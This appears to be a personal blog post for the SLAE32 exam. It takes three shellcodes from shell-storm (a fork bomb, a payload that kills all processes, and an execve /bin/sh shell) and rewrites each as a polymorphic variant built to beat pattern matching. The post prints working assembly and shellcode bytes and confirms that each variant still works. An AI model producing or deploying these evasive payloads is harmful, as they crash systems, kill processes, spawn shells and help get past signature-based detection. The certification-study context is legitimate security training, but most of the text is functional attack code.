Polymorphic Shellcodes- SLAE32 Sixth Exam Assignment

3 minute read

Introduction

Hello Everyone! This blog post is dedicated to Assignment 6 of the SLAE32 Exam, which is to create 3 different polymorphic shellcodes from shell-storm.

Assignment 6 - Creating polymorphic shellcodes from Shell-Storm

There are 2 main instructions provided to us in this assignment:

Pick 3 shellcode samples from Shell-Storm and create polymorphic versions of them to beat pattern matching
The polymorphic version cannot be larger than 150% of the existing shellcode

The 3 payloads which i have decided to focus on are:

x86/forkbomb
x86/killps
x86/execve_bin/sh

forkbomb Shellcode

In computing, a fork bomb is a denial-of-service attack wherein a process continually replicates itself to deplete available system resources, slowing down or crashing the system due to resource starvation.

forkbomb

The original shellcode length is 7 bytes, and is presented below:

"\x6a\x02\x58\xcd\x80\xeb\xf9"

The original forkbomb.nasm code:

/* By Kris Katterjohn 8/29/2006
 *
 * 7 byte shellcode for a forkbomb
 *
 *
 *
 * section .text
 *
 *      global _start
 *
 * _start:
 *      push byte 2
 *      pop eax
 *      int 0x80
 *      jmp short _start
 */

I have decided to change the code to the following:

section .text

    global _start

_start:
	xor eax, eax
	inc eax
	inc eax
        push eax
   	pop eax
      	int 0x80
        jmp short _start

Now , i have to check my new shellcode length, and to see that i didn’t exceed the req’s of 150% maximum (which is >=11)

The new shellcode:

\x31\xc0\x40\x40\x50\x58\xcd\x80\xeb\xf6

Which is as we can see 10 bytes long, now let’s check if the fork bomb still work’s properly.

polyfork

And it is indeed working! we can see how the CPU is being flooded to 100% usage!

killps Shellcode

The following shellcode will kill all running process within the system.

The original shellcode length is 11 bytes, and is presented below:

 "\x31\xc0\xb0\x25\x6a\xff\x5b\xb1\x09\xcd\x80" 

The original killps.nasm code:

Title  : kill all running process 
Name   : 11 bytes sys_kill(-1,9) x86 linux shellcode
Date   : may, 31 2010
Author : gunslinger_
Web    : devilzc0de.com
blog   : gunslingerc0de.wordpress.com
tested on : ubuntu linux
*/
#include <stdio.h>

char *killer=
 "\x31\xc0"                    /* xor    %eax,%eax */
 "\xb0\x25"                    /* mov    $0x25,%al */
 "\x6a\xff"                    /* push   $0xffffffff */
 "\x5b"                        /* pop    %ebx */
 "\xb1\x09"                    /* mov    $0x9,%cl */
 "\xcd\x80"                    /* int    $0x80 */

I have decided to change the code to the following:

section .text

    global _start

_start:
	sub eax, eax
	mov al, 0x23
	inc al
	inc al
	push 0xffffffff
	pop ebx
	mov cl, 0x9
	int 0x80

Now , i have to check my new shellcode length, and to see that i didn’t exceed the req’s of 150% maximum (which is >=17)

The new shellcode:

"\x29\xc0\xb0\x23\xfe\xc0\xfe\xc0\x6a\xff\x5b\xb1\x09\xcd\x80"

Which is as we can see 15 bytes long, now let’s check if the killps shellcode still work’s properly.

killps

And it is indeed working! we can see how we are being kicked out frm the system

execve /bin/sh

The following shellcode will execbute /bin/sh.

The original shellcode length is 23 bytes, and is presented below:

 ""\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; 

The original execve.nasm code:

xor    %eax,%eax
push   %eax
push   $0x68732f2f
push   $0x6e69622f
mov    %esp,%ebx
push   %eax
push   %ebx
mov    %esp,%ecx
mov    $0xb,%al
int    $0x80

I have decided to change the code to the following:

global _start

section .text

_start:
	sub eax, eax
	push eax
	push 0x68732f2f
	push 0x6e69622f
	mov ebx, esp
	inc eax
	dec eax
	push eax
	push ebx
	mov ecx, esp
	mov al, 0xa
	inc al
	int 0x80

Now , i have to check my new shellcode length, and to see that i didn’t exceed the req’s of 150% maximum (which is >=17)

The new shellcode:

""\x29\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x40\x48\x50\x53\x89\xe1\xb0\x0a\xfe\xc0\xcd\x80""

Which is as we can see 27 bytes long, now let’s check if the execve shellcode still work’s properly.

27execve

And it is indeed working! we can see how we are executing the /bin/sh!

And that’s it for the sixth assignment!

References

forkbomb explanation -
forkbomb - https://en.wikipedia.org/wiki/Fork_bomb
killps - http://shell-storm.org/shellcode/files/shellcode-626.php
execve_bin/sh - http://shell-storm.org/shellcode/files/shellcode-827.php

Wrap-Up

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification

https://www.pentesteracademy.com/course?id=3

Student ID: SLAE - 1543

All the source code which i have used throughout the assignment is available here: https://github.com/NagliNagli/SLAE/tree/master/Polymorphic

Cheers, Gal.

Share on

Twitter Facebook LinkedIn

Gal Nagli

Polymorphic Shellcodes- SLAE32 Sixth Exam Assignment

Introduction

Assignment 6 - Creating polymorphic shellcodes from Shell-Storm

forkbomb Shellcode

killps Shellcode

execve /bin/sh

References

Wrap-Up

Share on

You may also enjoy

Poisoning your Cache for 1000$ - Approach to Exploitation Walkthrough

Broken Access Control on samsung.com subdomain leads to Mass Account Takeover of Samsung employees application accounts

How I could take over any Account on a USA Department of Defense Website due to a simple IDOR

Metasploit Shellcode Analysis - SLAE32 Fifth Exam Assignment